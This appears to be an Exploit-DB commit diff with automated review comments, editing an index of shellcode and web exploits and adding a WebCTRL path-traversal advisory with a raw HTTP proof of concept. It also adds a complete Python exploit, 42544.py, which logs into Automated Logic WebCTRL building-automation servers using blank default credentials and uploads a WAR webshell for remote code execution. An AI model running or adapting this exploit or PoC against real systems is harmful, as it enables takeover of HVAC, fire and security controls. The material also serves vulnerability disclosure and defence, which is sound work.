40061,platforms/lin_x86-64/shellcode/40061.c,"Linux/x86-64 - Bind Ncat Shell (4442/TCP) / SSL / Multi-Channel (4444-4447/TCP) / Persistant / Fork / IPv4/6 / Password Null-Free Shellcode (176 bytes)",2016-07-06,Kyzer,lin_x86-64,shellcode,0 40061,platforms/lin_x86-64/shellcode/40061.c,"Linux/x86-64 - Bind Ncat Shell (4442/TCP) / SSL / Multi-Channel (4444-4447/TCP) / Persistant / Fork / IPv4/6 / Password Null-Free Shellcode (176 bytes)",2016-07-06,Kyzer,lin_x86-64,shellcode,0
40075,platforms/lin_x86/shellcode/40075.c,"Linux/x86 - Reverse TCP /bin/sj Shell (192.168.227.129:4444) Shellcode (75 bytes)",2016-07-08,sajith,lin_x86,shellcode,0 40075,platforms/lin_x86/shellcode/40075.c,"Linux/x86 - Reverse TCP /bin/sh Shell (192.168.227.129:4444) Shellcode (75 bytes)",2016-07-08,sajith,lin_x86,shellcode,0
40079,platforms/lin_x86-64/shellcode/40079.c,"Linux/x86-64 - Reverse TCP Shell (10.1.1.4/TCP) / Continuously Probing via Socket / Port-Range (391-399) / Password (la crips) Null-Free Shellcode (172 bytes)",2016-07-11,Kyzer,lin_x86-64,shellcode,0 40079,platforms/lin_x86-64/shellcode/40079.c,"Linux/x86-64 - Reverse TCP Shell (10.1.1.4/TCP) / Continuously Probing via Socket / Port-Range (391-399) / Password (la crips) Null-Free Shellcode (172 bytes)",2016-07-11,Kyzer,lin_x86-64,shellcode,0
40110,platforms/lin_x86/shellcode/40110.c,"Linux/x86 - Reverse Xterm Shell (127.1.1.1:10) Shellcode (68 bytes)",2016-07-13,RTV,lin_x86,shellcode,0 40110,platforms/lin_x86/shellcode/40110.c,"Linux/x86 - Reverse Xterm Shell (127.1.1.1:10) Shellcode (68 bytes)",2016-07-13,RTV,lin_x86,shellcode,0
40122,platforms/lin_x86-64/shellcode/40122.txt,"Linux/x86-64 - Bind TCP Shell (4442/TCP) / Syscall Persistent / Multi-Terminal (4444-4447/TCP) / Password (la crips) / Daemon Shellcode (83/148/177 bytes)",2016-07-19,Kyzer,lin_x86-64,shellcode,0 40122,platforms/lin_x86-64/shellcode/40122.txt,"Linux/x86-64 - Bind TCP Shell (4442/TCP) / Syscall Persistent / Multi-Terminal (4444-4447/TCP) / Password (la crips) / Daemon Shellcode (83/148/177 bytes)",2016-07-19,Kyzer,lin_x86-64,shellcode,0
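Review bot: 40075 gets the `/bin/sj` typo fixed, but its endpoint is still written `(192.168.227.129:4444)` without the `/TCP` suffix that 40056 and the other TCP entries carry; add it in the same edit. The context line for 40061 also still reads `Persistant`.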
@ -16368,7 +16370,7 @@ id,file,description,date,author,platform,type,port
40560,platforms/win_x86/shellcode/40560.asm,"Windows x86 - Reverse UDP Keylogger (www.example.com:4444/UDP) Shellcode (493 bytes)",2016-10-17,Fugu,win_x86,shellcode,0 40560,platforms/win_x86/shellcode/40560.asm,"Windows x86 - Reverse UDP Keylogger (www.example.com:4444/UDP) Shellcode (493 bytes)",2016-10-17,Fugu,win_x86,shellcode,0
40781,platforms/win_x86-64/shellcode/40781.c,"Windows x64 - Reverse TCP Shell (192.168.232.129:4444/TCP) + Injection Shellcode (694 bytes)",2016-11-18,"Roziul Hasan Khan Shifat",win_x86-64,shellcode,0 40781,platforms/win_x86-64/shellcode/40781.c,"Windows x64 - Reverse TCP Shell (192.168.232.129:4444/TCP) + Injection Shellcode (694 bytes)",2016-11-18,"Roziul Hasan Khan Shifat",win_x86-64,shellcode,0
40808,platforms/lin_x86-64/shellcode/40808.c,"Linux/x86-64 - execve /bin/sh -c reboot Shellcode (89 bytes)",2016-11-22,"Ashiyane Digital Security Team",lin_x86-64,shellcode,0 40808,platforms/lin_x86-64/shellcode/40808.c,"Linux/x86-64 - execve /bin/sh -c reboot Shellcode (89 bytes)",2016-11-22,"Ashiyane Digital Security Team",lin_x86-64,shellcode,0
40821,platforms/win_x86-64/shellcode/40821.c,"Windows x64 - Download File + Execute Shellcode (358 bytes)",2016-11-23,"Roziul Hasan Khan Shifat",win_x86-64,shellcode,0 40821,platforms/win_x86-64/shellcode/40821.c,"Windows x64 - Download File (http://192.168.10.129/pl.exe) + Execute (C:\Users\Public\p.exe) Shellcode (358 bytes)",2016-11-23,"Roziul Hasan Khan Shifat",win_x86-64,shellcode,0
40872,platforms/lin_x86/shellcode/40872.c,"Linux/x86 - Reverse Netcat + mkfifo (-e option disabled) Shell (localhost:9999) Shellcode (180 bytes)",2016-12-05,"Filippo Bersani",lin_x86,shellcode,0 40872,platforms/lin_x86/shellcode/40872.c,"Linux/x86 - Reverse Netcat + mkfifo (-e option disabled) Shell (localhost:9999) Shellcode (180 bytes)",2016-12-05,"Filippo Bersani",lin_x86,shellcode,0
40924,platforms/lin_x86/shellcode/40924.c,"Linux/x86 - execve /bin/bash -c Arbitrary Command Execution Null-Free Shellcode (72 bytes)",2016-12-16,"Filippo Bersani",lin_x86,shellcode,0 40924,platforms/lin_x86/shellcode/40924.c,"Linux/x86 - execve /bin/bash -c Arbitrary Command Execution Null-Free Shellcode (72 bytes)",2016-12-16,"Filippo Bersani",lin_x86,shellcode,0
40981,platforms/win_x86-64/shellcode/40981.c,"Windows x64 - Bind TCP Password (h271508F) Shell (2493/TCP) Shellcode (825 bytes)",2017-01-01,"Roziul Hasan Khan Shifat",win_x86-64,shellcode,0 40981,platforms/win_x86-64/shellcode/40981.c,"Windows x64 - Bind TCP Password (h271508F) Shell (2493/TCP) Shellcode (825 bytes)",2017-01-01,"Roziul Hasan Khan Shifat",win_x86-64,shellcode,0
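Review bot: the new 40821 description embeds a Windows path with backslashes, `C:\Users\Public\p.exe`, inside the quoted field. The row is still valid CSV, but confirm that the tools reading files.csv do not treat backslash as an escape character, otherwise the path will be altered in search output. The same row says `Windows x64` while its platform column is `win_x86-64`; decide which spelling descriptions should use.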
@ -16385,17 +16387,17 @@ id,file,description,date,author,platform,type,port
41403,platforms/lin_x86/shellcode/41403.c,"Linux/x86 - SELinux Permissive Mode Switcher Shellcode (45 bytes)",2017-02-20,lu0xheap,lin_x86,shellcode,0 41403,platforms/lin_x86/shellcode/41403.c,"Linux/x86 - SELinux Permissive Mode Switcher Shellcode (45 bytes)",2017-02-20,lu0xheap,lin_x86,shellcode,0
41439,platforms/lin_x86-64/shellcode/41439.c,"Linux/x86-64 - Egghunter Shellcode (38 bytes)",2017-02-23,odzhancode,lin_x86-64,shellcode,0 41439,platforms/lin_x86-64/shellcode/41439.c,"Linux/x86-64 - Egghunter Shellcode (38 bytes)",2017-02-23,odzhancode,lin_x86-64,shellcode,0
41467,platforms/win_x86/shellcode/41467.c,"Windows x86 - Executable Directory Search Null-Free Shellcode (130 bytes)",2017-02-26,lu0xheap,win_x86,shellcode,0 41467,platforms/win_x86/shellcode/41467.c,"Windows x86 - Executable Directory Search Null-Free Shellcode (130 bytes)",2017-02-26,lu0xheap,win_x86,shellcode,0
41468,platforms/lin_x86-64/shellcode/41468.nasm,"Linux/x86-64 - Random Listener Shellcode (54 bytes)",2017-02-26,"Robert L. Taylor",lin_x86-64,shellcode,0 41468,platforms/lin_x86-64/shellcode/41468.nasm,"Linux/x86-64 - Bind TCP /bin/sh Shell (Random TCP Port) Shellcode (54 bytes)",2017-02-26,"Robert L. Taylor",lin_x86-64,shellcode,0
41477,platforms/lin_x86-64/shellcode/41477.c,"Linux/x86-64 - Reverse TCP Shell (192.168.1.45:4444/TCP) Shellcode (84 bytes)",2017-02-28,"Manuel Mancera",lin_x86-64,shellcode,0 41477,platforms/lin_x86-64/shellcode/41477.c,"Linux/x86-64 - Reverse TCP Shell (192.168.1.45:4444/TCP) Shellcode (84 bytes)",2017-02-28,"Manuel Mancera",lin_x86-64,shellcode,0
41481,platforms/win_x86/shellcode/41481.asm,"Windows x86 - Reverse TCP Staged Alphanumeric Shell (127.0.0.1:4444/TCP) Shellcode (332 Bytes)",2017-03-01,"Snir Levi",win_x86,shellcode,0 41481,platforms/win_x86/shellcode/41481.asm,"Windows x86 - Reverse TCP Staged Alphanumeric Shell (127.0.0.1:4444/TCP) Shellcode (332 Bytes)",2017-03-01,"Snir Levi",win_x86,shellcode,0
41498,platforms/lin_x86-64/shellcode/41498.nasm,"Linux/x86-64 - Setuid(0) + Execve(/bin/sh) Polymorphic Shellcode (31 bytes)",2017-03-03,"Robert L. Taylor",lin_x86-64,shellcode,0 41498,platforms/lin_x86-64/shellcode/41498.nasm,"Linux/x86-64 - setuid(0) + Execve(/bin/sh) Polymorphic Shellcode (31 bytes)",2017-03-03,"Robert L. Taylor",lin_x86-64,shellcode,0
41503,platforms/lin_x86-64/shellcode/41503.nasm,"Linux/x86-64 - Flush IPTables Rules (/sbin/iptables -F) Polymorphic Shellcode (47 bytes)",2017-03-03,"Robert L. Taylor",lin_x86-64,shellcode,0 41503,platforms/lin_x86-64/shellcode/41503.nasm,"Linux/x86-64 - Flush IPTables Rules (/sbin/iptables -F) Polymorphic Shellcode (47 bytes)",2017-03-03,"Robert L. Taylor",lin_x86-64,shellcode,0
41509,platforms/lin_x86-64/shellcode/41509.nasm,"Linux/x86-64 - Reverse Netcat Shell (127.0.0.1:1337) Shellcode (72 bytes)",2017-03-04,"Robert L. Taylor",lin_x86-64,shellcode,0 41509,platforms/lin_x86-64/shellcode/41509.nasm,"Linux/x86-64 - Reverse Netcat Shell (127.0.0.1:1337) Shellcode (72 bytes)",2017-03-04,"Robert L. Taylor",lin_x86-64,shellcode,0
41510,platforms/lin_x86-64/shellcode/41510.nsam,"Linux/x86-64 - Reverse Netcat Shell (127.0.0.1:1234) Polymorphic Shellcode (106 bytes)",2017-03-04,"Robert L. Taylor",lin_x86-64,shellcode,0 41510,platforms/lin_x86-64/shellcode/41510.nsam,"Linux/x86-64 - Reverse Netcat Shell (127.0.0.1:1234) Polymorphic Shellcode (106 bytes)",2017-03-04,"Robert L. Taylor",lin_x86-64,shellcode,0
41581,platforms/win_x86/shellcode/41581.c,"Windows x86 - Hide Console Window Shellcode (182 bytes)",2017-03-11,"Ege Balci",win_x86,shellcode,0 41581,platforms/win_x86/shellcode/41581.c,"Windows x86 - Hide Console Window Shellcode (182 bytes)",2017-03-11,"Ege Balci",win_x86,shellcode,0
41630,platforms/lin_x86/shellcode/41630.asm,"Linux/x86 - exceve(_/bin/sh_) Encoded Shellcode (44 Bytes)",2017-03-17,WangYihang,lin_x86,shellcode,0 41630,platforms/lin_x86/shellcode/41630.asm,"Linux/x86 - exceve(_/bin/sh_) Encoded Shellcode (44 Bytes)",2017-03-17,WangYihang,lin_x86,shellcode,0
41631,platforms/lin_x86/shellcode/41631.c,"Linux/x86 - Bind TCP /bin/sh Random Port Shell Shellcode (44 bytes)",2017-03-17,"Oleg Boytsev",lin_x86,shellcode,0 41631,platforms/lin_x86/shellcode/41631.c,"Linux/x86 - Bind TCP /bin/sh Shell (Random TCP Port) Shellcode (44 bytes)",2017-03-17,"Oleg Boytsev",lin_x86,shellcode,0
41635,platforms/lin_x86/shellcode/41635.txt,"Linux/x86 - File Reader Shellcode (54 Bytes)",2017-03-19,WangYihang,lin_x86,shellcode,0 41635,platforms/lin_x86/shellcode/41635.txt,"Linux/x86 - Read /etc/passwd Shellcode (54 Bytes)",2017-03-19,WangYihang,lin_x86,shellcode,0
42295,platforms/lin_x86/shellcode/42295.c,"Linux/x86 - Reverse TCP Shell (127.1.1.1:11111/TCP) Null-Free Shellcode (67 bytes)",2013-01-01,"Geyslan G. Bem",lin_x86,shellcode,0 42295,platforms/lin_x86/shellcode/42295.c,"Linux/x86 - Reverse TCP Shell (127.1.1.1:11111/TCP) Null-Free Shellcode (67 bytes)",2013-01-01,"Geyslan G. Bem",lin_x86,shellcode,0
41723,platforms/lin_x86/shellcode/41723.c,"Linux/x86 - Reverse TCP /bin/bash Shell (192.168.3.119:54321) Shellcode (110 bytes)",2017-03-24,JR0ch17,lin_x86,shellcode,0 41723,platforms/lin_x86/shellcode/41723.c,"Linux/x86 - Reverse TCP /bin/bash Shell (192.168.3.119:54321) Shellcode (110 bytes)",2017-03-24,JR0ch17,lin_x86,shellcode,0
41750,platforms/lin_x86-64/shellcode/41750.txt,"Linux/x86-64 - execve(_/bin/sh_) Shellcode (21 Bytes)",2017-03-28,WangYihang,lin_x86-64,shellcode,0 41750,platforms/lin_x86-64/shellcode/41750.txt,"Linux/x86-64 - execve(_/bin/sh_) Shellcode (21 Bytes)",2017-03-28,WangYihang,lin_x86-64,shellcode,0
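Review bot: 41498 is only half normalised. `Setuid(0)` becomes `setuid(0)`, but `Execve(/bin/sh)` keeps its capital, although the same patch lowercases `Execve` in 36857 and 36858. In the context lines, 41630 still reads `exceve(_/bin/sh_)`, and the size is written `Bytes` in 41481, 41630, 41635 and 41750 but `bytes` everywhere else; both are cheap to fix in this pass.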
@ -38035,7 +38037,9 @@ id,file,description,date,author,platform,type,port
41698,platforms/linux/webapps/41698.rb,"WordPress Theme Holding Pattern - Arbitrary File Upload (Metasploit)",2015-02-11,Metasploit,linux,webapps,0 41698,platforms/linux/webapps/41698.rb,"WordPress Theme Holding Pattern - Arbitrary File Upload (Metasploit)",2015-02-11,Metasploit,linux,webapps,0
41714,platforms/windows/webapps/41714.rb,"Distinct TFTP 3.10 - Writable Directory Traversal Execution (Metasploit)",2012-04-08,Metasploit,windows,webapps,0 41714,platforms/windows/webapps/41714.rb,"Distinct TFTP 3.10 - Writable Directory Traversal Execution (Metasploit)",2012-04-08,Metasploit,windows,webapps,0
42058,platforms/jsp/webapps/42058.py,"NetGain EM 7.2.647 build 941 - Authentication Bypass / Local File Inclusion",2017-05-24,f3ci,jsp,webapps,0 42058,platforms/jsp/webapps/42058.py,"NetGain EM 7.2.647 build 941 - Authentication Bypass / Local File Inclusion",2017-05-24,f3ci,jsp,webapps,0
42545,platforms/php/webapps/42545.txt,"Matrimonial Script - SQL Injection",2017-08-22,"Ihsan Sencan",php,webapps,0
42453,platforms/windows/webapps/42453.txt,"Quali CloudShell 7.1.0.6508 (Patch 6) - Persistent Cross-Site Scripting",2017-08-14,"Benjamin Lee",windows,webapps,0 42453,platforms/windows/webapps/42453.txt,"Quali CloudShell 7.1.0.6508 (Patch 6) - Persistent Cross-Site Scripting",2017-08-14,"Benjamin Lee",windows,webapps,0
42544,platforms/java/webapps/42544.py,"Automated Logic WebCTRL 6.5 - Unrestricted File Upload / Remote Code Execution",2017-08-22,LiquidWorm,java,webapps,0
41899,platforms/multiple/webapps/41899.html,"Apple WebKit / Safari 10.0.2(12602.3.12.0.1) - 'PrototypeMap::createEmptyStructure' Universal Cross-Site Scripting",2017-04-20,"Google Security Research",multiple,webapps,0 41899,platforms/multiple/webapps/41899.html,"Apple WebKit / Safari 10.0.2(12602.3.12.0.1) - 'PrototypeMap::createEmptyStructure' Universal Cross-Site Scripting",2017-04-20,"Google Security Research",multiple,webapps,0
41716,platforms/php/webapps/41716.txt,"Gr8 Tutorial Script - SQL Injection",2017-03-24,"Ihsan Sencan",php,webapps,0 41716,platforms/php/webapps/41716.txt,"Gr8 Tutorial Script - SQL Injection",2017-03-24,"Ihsan Sencan",php,webapps,0
41717,platforms/php/webapps/41717.txt,"Gr8 Gallery Script - SQL Injection",2017-03-24,"Ihsan Sencan",php,webapps,0 41717,platforms/php/webapps/41717.txt,"Gr8 Gallery Script - SQL Injection",2017-03-24,"Ihsan Sencan",php,webapps,0
@ -38259,6 +38263,7 @@ id,file,description,date,author,platform,type,port
42379,platforms/php/webapps/42379.txt,"Friends in War Make or Break 1.7 - Authentication Bypass",2017-07-25,Adam,php,webapps,0 42379,platforms/php/webapps/42379.txt,"Friends in War Make or Break 1.7 - Authentication Bypass",2017-07-25,Adam,php,webapps,0
42383,platforms/php/webapps/42383.html,"Friends in War Make or Break 1.7 - Cross-Site Request Forgery (Change Admin Password)",2017-07-26,shinnai,php,webapps,0 42383,platforms/php/webapps/42383.html,"Friends in War Make or Break 1.7 - Cross-Site Request Forgery (Change Admin Password)",2017-07-26,shinnai,php,webapps,0
42381,platforms/php/webapps/42381.txt,"Friends in War Make or Break 1.7 - SQL Injection",2017-07-26,"Ihsan Sencan",php,webapps,0 42381,platforms/php/webapps/42381.txt,"Friends in War Make or Break 1.7 - SQL Injection",2017-07-26,"Ihsan Sencan",php,webapps,0
42543,platforms/java/webapps/42543.txt,"Automated Logic WebCTRL 6.1 - Path Traversal / Arbitrary File Write",2017-08-22,LiquidWorm,java,webapps,0
42387,platforms/php/webapps/42387.txt,"Joomla! Component CCNewsLetter 2.1.9 - 'sbid' Parameter SQL Injection",2017-07-27,"Shahab Shamsi",php,webapps,0 42387,platforms/php/webapps/42387.txt,"Joomla! Component CCNewsLetter 2.1.9 - 'sbid' Parameter SQL Injection",2017-07-27,"Shahab Shamsi",php,webapps,0
42388,platforms/hardware/webapps/42388.txt,"FortiOS < 5.6.0 - Cross-Site Scripting",2017-07-28,patryk_bogdan,hardware,webapps,0 42388,platforms/hardware/webapps/42388.txt,"FortiOS < 5.6.0 - Cross-Site Scripting",2017-07-28,patryk_bogdan,hardware,webapps,0
42401,platforms/jsp/webapps/42401.rb,"Advantech SUSIAccess < 3.0 - Directory Traversal / Information Disclosure (Metasploit)",2017-08-01,"James Fitts",jsp,webapps,0 42401,platforms/jsp/webapps/42401.rb,"Advantech SUSIAccess < 3.0 - Directory Traversal / Information Disclosure (Metasploit)",2017-08-01,"James Fitts",jsp,webapps,0
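Review bot: The added 42543 row gives the version as a bare "6.1", but the advisory added in this same commit lists "6.1 and prior" across WebCTRL, i-Vu and SiteScan Web. Neighbouring rows in this hunk express ranges as "FortiOS < 5.6.0" and "Advantech SUSIAccess < 3.0"; consider a range form in the title so that version-based matching against the index does not miss the 6.0, 5.5 and 5.2 lines the advisory names.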
@ -38314,7 +38319,15 @@ id,file,description,date,author,platform,type,port
42501,platforms/php/webapps/42501.txt,"Joomla! Component Calendar Planner 1.0.1 - SQL Injection",2017-08-18,"Ihsan Sencan",php,webapps,0 42501,platforms/php/webapps/42501.txt,"Joomla! Component Calendar Planner 1.0.1 - SQL Injection",2017-08-18,"Ihsan Sencan",php,webapps,0
42502,platforms/php/webapps/42502.txt,"Joomla! Component SP Movie Database 1.3 - SQL Injection",2017-08-18,"Ihsan Sencan",php,webapps,0 42502,platforms/php/webapps/42502.txt,"Joomla! Component SP Movie Database 1.3 - SQL Injection",2017-08-18,"Ihsan Sencan",php,webapps,0
42504,platforms/php/webapps/42504.txt,"DeWorkshop 1.0 - Arbitrary File Upload",2017-08-18,"Ihsan Sencan",php,webapps,0 42504,platforms/php/webapps/42504.txt,"DeWorkshop 1.0 - Arbitrary File Upload",2017-08-18,"Ihsan Sencan",php,webapps,0
42505,platforms/php/webapps/42505.txt,"iTech B2B Script 4.42 - SQL Injection",2017-08-18,"Ihsan Sencan",php,webapps,0
42517,platforms/xml/webapps/42517.txt,"QuantaStor Software Defined Storage < 4.3.1 - Multiple Vulnerabilities",2017-08-18,VVVSecurity,xml,webapps,0 42517,platforms/xml/webapps/42517.txt,"QuantaStor Software Defined Storage < 4.3.1 - Multiple Vulnerabilities",2017-08-18,VVVSecurity,xml,webapps,0
42506,platforms/php/webapps/42506.txt,"iTech Business Networking Script 8.26 - SQL Injection",2017-08-18,"Ihsan Sencan",php,webapps,0
42507,platforms/php/webapps/42507.txt,"iTech Caregiver Script 2.71 - SQL Injection",2017-08-18,"Ihsan Sencan",php,webapps,0
42508,platforms/php/webapps/42508.txt,"iTech Classifieds Script 7.41 - SQL Injection",2017-08-18,"Ihsan Sencan",php,webapps,0
42509,platforms/php/webapps/42509.txt,"iTech Image Sharing Script 4.13 - SQL Injection",2017-08-18,"Ihsan Sencan",php,webapps,0
42510,platforms/php/webapps/42510.txt,"iTech Freelancer Script 5.27 - SQL Injection",2017-08-18,"Ihsan Sencan",php,webapps,0
42511,platforms/php/webapps/42511.txt,"iTech Travel Script 9.49 - SQL Injection",2017-08-18,"Ihsan Sencan",php,webapps,0
42513,platforms/php/webapps/42513.txt,"iTech Multi Vendor Script 6.63 - SQL Injection",2017-08-18,"Ihsan Sencan",php,webapps,0
42524,platforms/php/webapps/42524.txt,"Joomla! Component Flip Wall 8.0 - 'wallid' Parameter SQL Injection",2017-08-21,"Ihsan Sencan",php,webapps,0 42524,platforms/php/webapps/42524.txt,"Joomla! Component Flip Wall 8.0 - 'wallid' Parameter SQL Injection",2017-08-21,"Ihsan Sencan",php,webapps,0
42525,platforms/php/webapps/42525.txt,"Joomla! Component Sponsor Wall 8.0 - SQL Injection",2017-08-21,"Ihsan Sencan",php,webapps,0 42525,platforms/php/webapps/42525.txt,"Joomla! Component Sponsor Wall 8.0 - SQL Injection",2017-08-21,"Ihsan Sencan",php,webapps,0
42526,platforms/php/webapps/42526.txt,"PHP Classifieds Script 5.6.2 - SQL Injection",2017-08-21,"Ihsan Sencan",php,webapps,0 42526,platforms/php/webapps/42526.txt,"PHP Classifieds Script 5.6.2 - SQL Injection",2017-08-21,"Ihsan Sencan",php,webapps,0
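Review bot: The iTech rows added here run 42505 to 42511 and then 42513, so 42512 is absent from this hunk, and 42505 is separated from the rest of the series by the existing 42517 row. Please confirm that 42512 is indexed elsewhere in the file or intentionally omitted, and consider keeping the series contiguous so consumers that scan by id range do not see an unexplained gap.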


@ -0,0 +1,64 @@
Automated Logic WebCTRL 6.1 Path Traversal Arbitrary File Write
Vendor: Automated Logic Corporation
Product web page: http://www.automatedlogic.com
Affected version: ALC WebCTRL, SiteScan Web 6.1 and prior
ALC WebCTRL, i-Vu 6.0 and prior
ALC WebCTRL, i-Vu, SiteScan Web 5.5 and prior
ALC WebCTRL, i-Vu, SiteScan Web 5.2 and prior
Summary: WebCTRL®, Automated Logic's web-based building automation
system, is known for its intuitive user interface and powerful integration
capabilities. It allows building operators to optimize and manage
all of their building systems - including HVAC, lighting, fire, elevators,
and security - all within a single HVAC controls platform. It's everything
they need to keep occupants comfortable, manage energy conservation measures,
identify key operational problems, and validate the results.
Desc: The vulnerability is triggered by an authenticated user that can use
the manualcommand console in the management panel of the affected application.
The ManualCommand() function in ManualCommand.js allows users to perform additional
diagnostics and settings overview by using pre-defined set of commands. This
can be exploited by using the echo command to write and/or overwrite arbitrary
files on the system including directory traversal throughout the system.
Tested on: Microsoft Windows 7 Professional (6.1.7601 Service Pack 1 Build 7601)
Apache-Coyote/1.1
Apache Tomcat/7.0.42
CJServer/1.1
Java/1.7.0_25-b17
Java HotSpot Server VM 23.25-b01
Ant 1.7.0
Axis 1.4
Trove 2.0.2
Xalan Java 2.4.1
Xerces-J 2.6.1
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2017-5430
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2017-5430.php
CVE ID: CVE-2017-9640
CVE URL: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-9640
30.01.2017
--
PoC:
GET /_common/servlet/lvl5/manualcommand?wbs=251&action=echo%20peend>..\touch.txt&id=7331 HTTP/1.1
Host: TARGET
---
GET http://TARGET/touch.txt HTTP/1.1
peend
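Review bot: The advisory ends at the PoC and gives no fixed version, vendor response or mitigation, and unlike the 42544.py header in this commit it carries no ICS-CERT reference. A line stating the remediated release (or that none exists) would let operators of the listed WebCTRL, i-Vu and SiteScan Web versions scope their exposure. The "Desc:" text also calls the command set "pre-defined" while the PoC shows `echo` with a redirection to a path outside the servlet directory; it should state whether the missing control is on the command arguments or on the output path, since that determines what a fix has to validate.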

platforms/java/webapps/42544.py Executable file

@ -0,0 +1,231 @@
#!/usr/bin/env python
# -*- coding: utf8 -*-
#
#
# Automated Logic WebCTRL 6.5 Unrestricted File Upload Remote Code Execution
#
#
# Vendor: Automated Logic Corporation
# Product web page: http://www.automatedlogic.com
# Affected version: ALC WebCTRL, i-Vu, SiteScan Web 6.5 and prior
# ALC WebCTRL, SiteScan Web 6.1 and prior
# ALC WebCTRL, i-Vu 6.0 and prior
# ALC WebCTRL, i-Vu, SiteScan Web 5.5 and prior
# ALC WebCTRL, i-Vu, SiteScan Web 5.2 and prior
#
# Summary: WebCTRL®, Automated Logic's web-based building automation
# system, is known for its intuitive user interface and powerful integration
# capabilities. It allows building operators to optimize and manage
# all of their building systems - including HVAC, lighting, fire, elevators,
# and security - all within a single HVAC controls platform. It's everything
# they need to keep occupants comfortable, manage energy conservation measures,
# identify key operational problems, and validate the results.
#
# Desc: WebCTRL suffers from an authenticated arbitrary code execution
# vulnerability. The issue is caused due to the improper verification
# when uploading Add-on (.addons or .war) files using the uploadwarfile
# servlet. This can be exploited to execute arbitrary code by uploading
# a malicious web archive file that will run automatically and can be
# accessed from within the webroot directory. Additionaly, an improper
# authorization access control occurs when using the 'anonymous' user.
# By specification, the anonymous user should not have permissions or
# authorization to upload or install add-ons. In this case, when using
# the anonymous user, an attacker is still able to upload a malicious
# file via insecure direct object reference and execute arbitrary code.
# The anonymous user was removed from version 6.5 of WebCTRL.
#
# Tested on: Microsoft Windows 7 Professional (6.1.7601 Service Pack 1 Build 7601)
# Apache-Coyote/1.1
# Apache Tomcat/7.0.42
# CJServer/1.1
# Java/1.7.0_25-b17
# Java HotSpot Server VM 23.25-b01
# Ant 1.7.0
# Axis 1.4
# Trove 2.0.2
# Xalan Java 2.4.1
# Xerces-J 2.6.1
#
#
# Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
# @zeroscience
#
#
# Advisory ID: ZSL-2017-5431
# Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2017-5431.php
#
# ICS-CERT: https://ics-cert.us-cert.gov/advisories/ICSA-17-234-01
# CVE ID: CVE-2017-9650
# CVE URL: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-9650
#
#
# 30.01.2017
#
#
import itertools
import mimetools
import mimetypes
import cookielib
import binascii
import urllib2
import urllib
import sys
import re
import os
from urllib2 import URLError
global bindata
__author__ = 'lqwrm'
piton = os.path.basename(sys.argv[0])
def bannerche():
print '''
@-------------------------------------------------@
| |
| WebCTRL 6.5 Authenticated RCE PoC |
| ID: ZSL-2017-5431 |
| Copyleft (c) 2017, Zero Science Lab |
| |
@-------------------------------------------------@
'''
if len(sys.argv) < 3:
print '[+] Usage: '+piton+' <IP> <WAR FILE>'
print '[+] Example: '+piton+' 10.0.0.17 webshell.war\n'
sys.exit()
bannerche()
host = sys.argv[1]
filename = sys.argv[2]
with open(filename, 'rb') as f:
content = f.read()
hexo = binascii.hexlify(content)
bindata = binascii.unhexlify(hexo)
cj = cookielib.CookieJar()
opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(cj))
urllib2.install_opener(opener)
print '[+] Probing target http://'+host
try:
checkhost = opener.open('http://'+host+'/index.jsp?operatorlocale=en')
except urllib2.HTTPError, errorzio:
if errorzio.code == 404:
print '[!] Error 001:'
print '[-] Check your target!'
print
sys.exit()
except URLError, errorziocvaj:
if errorziocvaj.reason:
print '[!] Error 002:'
print '[-] Check your target!'
print
sys.exit()
print '[+] Target seems OK.'
print '[+] Login please:'
print '''
Default username: Administrator, Anonymous
Default password: (blank), (blank)
'''
username = raw_input('[*] Enter username: ')
password = raw_input('[*] Enter password: ')
login_data = urllib.urlencode({'pass':password, 'name':username, 'touchscr':'false'})
opener.addheaders = [('User-agent', 'Thrizilla/33.9')]
login = opener.open('http://'+host+'/?language=en', login_data)
auth = login.read()
if re.search(r'productName = \'WebCTRL', auth):
print '[+] Authenticated!'
token = re.search('wbs=(.+?)&', auth).group(1)
print '[+] Got wbs token: '+token
cookie1, cookie2 = [str(c) for c in cj]
cookie = cookie1[8:51]
print '[+] Got cookie: '+cookie
else:
print '[-] Incorrect username or password.'
print
sys.exit()
print '[+] Sending payload.'
class MultiPartForm(object):
def __init__(self):
self.form_fields = []
self.files = []
self.boundary = mimetools.choose_boundary()
return
def get_content_type(self):
return 'multipart/form-data; boundary=%s' % self.boundary
def add_field(self, name, value):
self.form_fields.append((name, value))
return
def add_file(self, fieldname, filename, fileHandle, mimetype=None):
body = fileHandle.read()
if mimetype is None:
mimetype = mimetypes.guess_type(filename)[0] or 'application/octet-stream'
self.files.append((fieldname, filename, mimetype, body))
return
def __str__(self):
parts = []
part_boundary = '--' + self.boundary
parts.extend(
[ part_boundary,
'Content-Disposition: form-data; name="%s"' % name,
'',
value,
]
for name, value in self.form_fields
)
parts.extend(
[ part_boundary,
'Content-Disposition: file; name="%s"; filename="%s"' % \
(field_name, filename),
'Content-Type: %s' % content_type,
'',
body,
]
for field_name, filename, content_type, body in self.files
)
flattened = list(itertools.chain(*parts))
flattened.append('--' + self.boundary + '--')
flattened.append('')
return '\r\n'.join(flattened)
if __name__ == '__main__':
form = MultiPartForm()
form.add_field('wbs', token)
form.add_field('file"; filename="'+filename, bindata)
request = urllib2.Request('http://'+host+'/_common/servlet/lvl5/uploadwarfile')
request.add_header('User-agent', 'SCADA/8.0')
body = str(form)
request.add_header('Content-type', form.get_content_type())
request.add_header('Cookie', cookie)
request.add_header('Content-length', len(body))
request.add_data(body)
request.get_data()
urllib2.urlopen(request).read()
print '[+] Payload uploaded.'
print '[+] Shell available at: http://'+host+'/'+filename[:-4]
print
sys.exit()
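Review bot: The header comment lists "6.5 and prior" as affected and then states "The anonymous user was removed from version 6.5 of WebCTRL", yet the login prompt still advertises "Anonymous" as a default username without saying which versions that applies to. Suggest the description spell out which affected versions carry the anonymous authorization flaw and which only the upload verification flaw, and name the fixed release from the linked ICSA-17-234-01 advisory so defenders can scope exposure. The script is also Python 2 only (print statements, urllib2, mimetools) under a generic `#!/usr/bin/env python` shebang, and the hexlify/unhexlify round trip on the file content is a no-op; a note on the required interpreter belongs in the header.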


@ -1,3 +1,4 @@
/* /*
